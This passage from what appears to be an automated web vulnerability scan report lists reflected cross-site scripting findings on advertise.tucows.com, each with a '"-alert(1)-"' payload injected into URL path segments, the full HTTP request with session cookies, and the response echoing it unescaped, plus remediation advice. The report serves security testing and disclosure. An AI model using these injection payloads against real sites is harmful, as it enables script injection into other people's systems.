Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.27. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f090"-alert(1)-"a04c13647f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.28. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a6f"-alert(1)-"48e3c448543 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:20 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.29. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a4"-alert(1)-"da5a49629e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js505a4"-alert(1)-"da5a49629e/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:26 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js505a4"-alert(1)-"da5a49629e/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.30. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ad87"-alert(1)-"ee3d1dab97f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.31. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f637"-alert(1)-"80f9081ac8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:29 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.32. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49de9"-alert(1)-"04a15e87fd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:45 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.33. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a9a"-alert(1)-"237aaaa614c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.34. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f64"-alert(1)-"4bb4721a55e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:57:07 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

3.35. http://advertise.tucows.com/includes/themes/03BlueMeany/styles.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/styles.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86915"-alert(1)-"a2383cc0931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes86915"-alert(1)-"a2383cc0931/themes/03BlueMeany/styles.css";
_ARTICLE_ID = "";
